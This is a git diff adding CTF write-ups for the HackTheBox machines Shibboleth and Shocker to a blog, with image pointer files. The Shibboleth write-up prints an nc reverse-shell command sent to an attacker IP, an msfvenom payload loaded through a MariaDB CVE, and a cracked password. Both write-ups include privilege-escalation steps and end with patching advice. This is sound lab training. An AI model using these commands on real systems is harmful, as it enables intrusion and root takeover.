index 0000000..3729a0a
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fb4612974f8eba8db43de209541d2aa643ca04cb14ffed697fc4fc3ac7e1e94c
+size 41538
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.png
new file mode 100644
index 0000000..b0fb831
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a80d4e2fa41c171db5dbb77a26d18f5ff5fe8becd60155bdec3f7e620cffea7a
+size 12570
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.webp
new file mode 100644
index 0000000..c1cd95d
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b4b6d49f53f6eaa43512e7be35d8118a27e7591fa7b201adc1004a6b722bb164
+size 7812
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.png
new file mode 100644
index 0000000..e69cd3d
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d6433341d966966362751b3093e6fce254d1b94698e691ea476520100fdb64b1
+size 44497
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.webp
new file mode 100644
index 0000000..41c0d4f
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0377b4203fef0a20016440516b2b87e99afce157364e69afee3ae13247c2d3b6
+size 28530
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.png
new file mode 100644
index 0000000..1a49427
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5666be746d3455991ca45b591bd81a911d9cc45f779b9833e543d278215bb1cd
+size 37258
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.webp
new file mode 100644
index 0000000..5e5909e
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4dfadbaa7fd00d6b4e0bf67d92dbe96869208043043e55a91cb17e7703f09fb5
+size 30834
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.png
new file mode 100644
index 0000000..719a79d
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:560ab74931d59f44b167e086a8f30411c4888d1bf1a871a686f2c89439cadb79
+size 112627
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.webp
new file mode 100644
index 0000000..75d1d52
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:81f503ecc644eec71ff93e3e659bfdf22ffe9abbf304c59bc67f11db23b811d8
+size 50178
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.png
new file mode 100644
index 0000000..f854f0f
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c26f045c84dd5b2d514b16f4222107d8d2e015ca88ee4608c4ffe1dd2b94851c
+size 21375
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.webp
new file mode 100644
index 0000000..182c30b
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cb13953646c0d4f640915eb415e4207cf661ffce819279468cea795d31f1c54b
+size 13056
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/index.md b/content/writeup-ctf/writeup-shibboleth-htb/index.md
new file mode 100644
index 0000000..74ea50b
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/index.md
@@ -0,0 +1,169 @@
+---
+title: "Writeup - Shibboleth (HTB)"
+date: 2022-04-02
+slug: "writeup-shibboleth-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Shibboleth](https://app.hackthebox.com/machines/Shibboleth) machine on the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.124
+```
+One TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 80/tcp : HTTP web server (Apache 2.4.41)
+
+![](img/image-2.webp)
+
+## Exploit
+
+At first I start by making a scan of the pages of the site:
+
+![](img/image-3.webp)
+
+Then I make a scan of the subdomain:
+
+![](img/image-4.webp)
+
+I find 3 different subdomains, I add them to the `/etc/hosts`. Then I access the site `zabbix.shibboleth.htb` and I arrive on an authentication page!
+
+![](img/image-5.webp)
+
+After some research, I can't find anything in particular. So I try to do a UDP scan to see if any additional ports are open. For that I use the following command:
+
+
+```bash
+sudo nmap -sU --min-rate 5000 shibboleth.htb
+```
+![](img/image-6.webp)
+
+The port 623/udp is open, after some research on google I find this port is used for IPMI (Intelligent Platform Management Interface). I quickly find an exploit related to this port:
+
+[623/UDP/TCP - IPMI - HackTricks](https://book.hacktricks.xyz/pentesting/623-udp-ipmi)
+
+So I launch Metasploit and I set the extension with the following commands:
+
+
+```bash
+use auxiliary/scanner/ipmi/ipmi_dumphashes
+set RHOSTS shibboleth.htb
+set OUTPUT_JOHN_FILE hash
+```
+After a few seconds, it returns the hash of an `Administrateur` user!
+
+
+```bash
+[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:156faf2282010000498ef9d2af7763ced04cc2a26058817d46f358e7f7f1991b35fd4a73def2e04ea123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:6b18bd2fb3309ee821c2ade2e1bcc9f2a8c75519
+```
+I try to crack it with john using the following command:
+
+
+```bash
+john hash --wordlist=rockyou.txt
+```
+![](img/image-7.webp)
+
+John finds the following password: `ilovepumkinpie1`.
+
+I then credit them on the previous authentication page and it works.
+
+![](img/image-8.webp)
+
+After some research I find that it is possible to execute commands by creating an item via the administration panel. For that I go on the following page:
+
+Configuration -> Hosts -> Item -> Create Item
+
+I give a name to the item then I return the following key value:
+
+
+```bash
+name: shell
+key : system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.103 1234 >/tmp/f,nowait]
+```
+I can now test the item with the `Get value and test` button.
+
+![](img/image-9.webp)
+
+I now have a reverse shell with the user `zabbix`.
+
+![](img/image-10.webp)
+
+I start by upgrading my shell with the following command:
+
+
+```bash
+python3 -c 'import pty; pty.spawn("/bin/bash")'
+```
+Then I realize that the first flag is held by the user `ipmi-svc`. This is the same name as the port I exploited above, so I try to change the user with the same password:
+
+
+```bash
+zabbix@shibboleth:/home/ipmi-svc$ su ipmi-svc 
+su ipmi-svc
+Password: ilovepumkinpie1
+
+ipmi-svc@shibboleth:~$ cat user.txt
+cat user.txt
+70c2f49504f02ded92ccbef9b3c95b35
+```
+I now have access to the first flag.
+
+## Privilege escalation
+
+I start by uploading the [linPeas.sh](https://linpeas.sh) script then I run it. I notice 2 things in the result:
+
+- The mysql service is run by the root user
+- I have access to a file with a username and password to access the database
+
+![](img/image-11.webp)
+
+So I try to connect to the database with the following command:
+
+
+```bash
+mysql -h 127.0.0.1 -u zabbix -p
+```
+![](img/image-12.webp)
+
+The credentials work well and allow me to discover the version of the mysql database: MariaDB 10.3.25.
+
+After some research I find that this version is sensitive to [CVE-2021-27928](https://github.com/Al1ex/CVE-2021-27928). This CVE allows to create a reverse shell root !
+
+So I start by creating a payload with the following command:
+
+
+```bash
+msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.103 LPORT=2345 -f elf-so -o exploit.so
+```
+Then after uploading it to the target machine, I set the global variable wsrep\_provider with this same payload:
+
+
+```bash
+mysql -h 127.0.0.1 -u zabbix -p -e 'SET GLOBAL wsrep_provider="/tmp/exploit.so";'
+```
+![](img/image-13.webp)
+
+I now have a reverse shell as `root` and I can get the last flag.
+
+
+```bash
+root@shibboleth:/var/lib/mysql# cat /root/root.txt
+cat /root/root.txt
+6e4f289fbcc6803513ffe5a5dae46b85
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update IPMI to avoid dumps of user hashes
+- Do not use the same password across multiple services
+- Do not run MariaDB as root
+- Update MariaDB to avoid the reverse shell exploit
diff --git a/content/writeup-ctf/writeup-shocker-htb/featured.png b/content/writeup-ctf/writeup-shocker-htb/featured.png
new file mode 100644
index 0000000..6fb6a20
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d7bf1855209bcea6dbe3030f2ba62bd001667bf2056e6596689cb9918b761cb9
+size 384694
diff --git a/content/writeup-ctf/writeup-shocker-htb/featured.webp b/content/writeup-ctf/writeup-shocker-htb/featured.webp
new file mode 100644
index 0000000..a3bdfe3
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d0e42178fca2e3762c633f9a8b5df6659d656b73b1ad8e3cd0b818adf060d97a
+size 36680
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-1.png b/content/writeup-ctf/writeup-shocker-htb/img/image-1.png
new file mode 100644
index 0000000..5dbcc62
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b3439dc2ace422b07b48423a0a523c9f4f8a8e101df6bef72de7e16e99f10d13
+size 34714
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp
new file mode 100644
index 0000000..eab3c0e
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f825975bbe348ab538a98dd00dc0eebfc6ee1179bb937063addfa3157b19bbd2
+size 34426
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-2.png b/content/writeup-ctf/writeup-shocker-htb/img/image-2.png
new file mode 100644
index 0000000..6440b5a
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3090b09708dcc43964d544c460ac0b9d5610cdf81e9d46201757279447eebd8b
+size 87776
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp
new file mode 100644
index 0000000..c96d6a8
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1199cdd94b66e4cea19976def683bca47223f9c18e1f8718810a4a5116284de8
+size 19818
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-3.png b/content/writeup-ctf/writeup-shocker-htb/img/image-3.png
new file mode 100644
index 0000000..4cc01f5
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b039b64d3f2225f6143ac7858df5e4565d60d5b8656b4e600cfb58b4ea097a76
+size 57423
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp
new file mode 100644
index 0000000..1d489e9
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a11e0d051291d45079c50c49a581ff3bedf22c5c8dc1ee125808a1b51d4af3c5
+size 60682
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-4.png b/content/writeup-ctf/writeup-shocker-htb/img/image-4.png
new file mode 100644
index 0000000..629b0f7
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:026e2d11e3d0a9867c9f6b0234e92c9a6337351bc30951256b5a5c717407ea30
+size 62023
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp
new file mode 100644
index 0000000..3a1974b
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3daf306376bdf524a005a106c23308b0e68b989a9b88aa94d0794db36d2c9f80
+size 56220
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-5.png b/content/writeup-ctf/writeup-shocker-htb/img/image-5.png
new file mode 100644
index 0000000..06cfa66
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d03ab144c8dd1549e487d557cbfc4564c70e1da15b1cd315abb2abb0bc8c70c3
+size 56032
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp
new file mode 100644
index 0000000..713f5b4
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b110685005fc831b67f1377040b6d8e9cc22f3b9a9cc445d5c9931c9a9018175
+size 46354
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-6.png b/content/writeup-ctf/writeup-shocker-htb/img/image-6.png
new file mode 100644
index 0000000..fbd14f2
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ebf2734e41e05ea137dd62aa70a77eedf6d6243aab5424a69a2e8c61b8e61d7a
+size 7585
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp
new file mode 100644
index 0000000..65cd702
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2528d614165a82c7cd3342fe0a91e0dcb457806650c1b9b4a238f040d08802e5
+size 7832
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-7.png b/content/writeup-ctf/writeup-shocker-htb/img/image-7.png
new file mode 100644
index 0000000..60c11a5
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9e448ab66ad4e004a7b19211b0639deacfab314e9286a120fae2c71dd9a01ff0
+size 16991
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp
new file mode 100644
index 0000000..8ff6b78
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b3a93b6839bbb73270b989d589bf38cf3a9a962e72d4a38a3cc77fc2035755dd
+size 20116
diff --git a/content/writeup-ctf/writeup-shocker-htb/index.md b/content/writeup-ctf/writeup-shocker-htb/index.md
new file mode 100644
index 0000000..10379d1
--- /dev/null
+++ b/content/writeup-ctf/writeup-shocker-htb/index.md
@@ -0,0 +1,91 @@
+---
+title: "Writeup - Shocker (HTB)"
+date: 2022-05-12
+slug: "writeup-shocker-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Shocker](https://app.hackthebox.com/machines/Shocker) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 2222/tcp : SSH port (OpenSSH 7.2p2)
+- 80/tcp : HTTP web server (Apache 2.4.18)
+
+![](img/image-2.webp)
+
+## Exploit
+
+At first I start by listing the files of the website.
+
+![](img/image-3.webp)
+
+We find a `cgi-bin` folder.
+
+![](img/image-4.webp)
+
+Listing the folder we find a file: `user.sh`.
+
+
+```bash
+Content-Type: text/plain
+
+Just an uptime test script
+
+ 03:47:39 up 10 min,  0 users,  load average: 0.00, 0.00, 0.00
+```
+10.10.10.56/cgi-bin/user.shBy searching a little bit I quickly find exploits to [cgi-bin](https://book.hacktricks.xyz/pentesting/pentesting-web/cgi). I choose to use the Metasploit module: `multi/http/apache_mod_cgi_bash_env_exec`.
+
+![](img/image-5.webp)
+
+By running the module I get a reverse shell. I start by upgrading this reverse shell :
+
+![](img/image-6.webp)
+
+Then I get the first flag.
+
+
+```bash
+shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt
+cat /home/shelly/user.txt
+2ec24e11320026d1e70ff3e16695b233
+```
+## Privilege escalation
+
+I start by checking the sudo permissions of my user.
+
+![](img/image-7.webp)
+
+Looking on GTFO, I find the page associated to [Perl](https://gtfobins.github.io/gtfobins/perl/#sudo). I use the following command to generate a SH session as root:
+
+
+```bash
+sudo perl -e 'exec "/bin/sh";'
+```
+I can now recover the last flag.
+
+
+```bash
+# id
+id
+uid=0(root) gid=0(root) groups=0(root)
+# cat /root/root.txt
+cat /root/root.txt
+52c2715605d70c7619030560dc1ca467
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update the machine to patch shellshock
+- Do not allow root rights to run perl
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.png
new file mode 100644
index 0000000..5182a4c
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cf368d780a820c74f328cb248dc31a9f5496a1ebba06f6a8bb22435973ece040
+size 150753
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.webp
new file mode 100644
index 0000000..4276d45
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d64c91634d5c952948e3cdfd18da822fdd5d24978a95292ff8941828da746dab
+size 91950
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.png
new file mode 100644
index 0000000..7be85af
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:51ddf88f1e832321be671296159fa840f35704a195e273dcf46d6add6207b0d5
+size 45343
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.webp
new file mode 100644
index 0000000..7cbf5f7
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c813353bdf9cd990f71eaf7a56487b7b6a553080e5e64e2a92c24e1c3dc4b6bb
+size 39976
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.png
new file mode 100644
index 0000000..7970a17
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c41d8a769a61a6e9a7a6155eb0f2909899950e6e19cc6179f76342c51afa1c1d
+size 43919
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.webp
new file mode 100644
index 0000000..6a65019
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8a67f7580f63c22b323432ccdfbb5f7522815cd86fdf773b029c670a461b8699
+size 33336
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.png
new file mode 100644
index 0000000..f0846fe
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3a6cdbf0a8ed4ca417d416e438f90dfabb01464c126b22858e2f49177db61082
+size 28448
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.webp
new file mode 100644
index 0000000..85f89bd
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c3d7311cd6cb66913a4dba00fed96dbed2373bd62b402b204528c3e821e9f4d1
+size 24894
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.png
new file mode 100644
index 0000000..ab01456
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:98d87f6cb58053b1cd3084d49f3f38cbdaf512c19821e3c7be7b495891817772
+size 25605
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.webp
new file mode 100644
index 0000000..dff9d1e
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8caa18a6721455d519d00817be2e0c1902bdb9e48e6988e7c9b97dce05ef3ba0
+size 27144
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.png
new file mode 100644
index 0000000..afd7e70
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:82be2e63eca591071711c5db472f82ff765827e1cdd25aaaf09f171b4ef05faf
+size 17964
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.webp
new file mode 100644
index 0000000..b270134
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:93f8e2303328980f8c67c133681ac05d7de45c3ea56acf51ead7a276a3b23dba
+size 17212
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.png
new file mode 100644
index 0000000..a6ec94a
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9644dc96bc68d12be8d11fbb48624e83dd970d5040687eed004c1c07b598d46b
+size 25737
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.webp
new file mode 100644
index 0000000..9d0111a
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9db82c066d2a9a7aa68679c327acd37cb062f72edb19b67ea31353397d1d3404
+size 26638
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.png
new file mode 100644
index 0000000..b457c00
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:eca01066449bf06ffca64618f6fdcb0c45f6f4950505c63fa9a177b2f17fc566
+size 183081
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.webp
new file mode 100644
index 0000000..25f43ee
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:22dc25fac7efacf55f6838699c4c3aa233247d860acbfaa30bae26b4b87a53df
+size 148392
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.png
new file mode 100644
index 0000000..8d33516
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b0274bea9297bf02e7fb9bd6351f2a136a5a520c2c676b0e7024c3b0b43fd69a
+size 65134
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.webp
new file mode 100644
index 0000000..2dee235
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8a4d34cf24004f60ba18d4b1502101702ef5f66b9b4a6c88e5a36efa2068b8dc
+size 67682
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.png
new file mode 100644
index 0000000..5ac51ca
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d8d780b23ed884aa33c67754c34c378045199d8a3d69ded62210d4a7bde57c0c
+size 284503
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.webp
new file mode 100644
index 0000000..4aa1693
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ea0c9b7d5b4d30a9b197859c053467ec286c4f2acb964581891116e4088484ce
+size 94440
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.png
new file mode 100644
index 0000000..79634fe
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d05c1de3b46ccff3981535d1c1ddfa2eacca4374dc90cb5bca098c7e997fde5a
+size 555403
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.webp
new file mode 100644
index 0000000..25dbbd1
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bf0c05aed715b5665ad1e756fa7ca6d8a81d7dbe20e71751863816196ebab616
+size 50762
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.png
new file mode 100644
index 0000000..70def27
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a2a406af625832caf136239b77ee55c9a14753236108d4b00b8eec88c90962b2
+size 17462
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.webp
new file mode 100644
index 0000000..1cbbcd4
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.webp
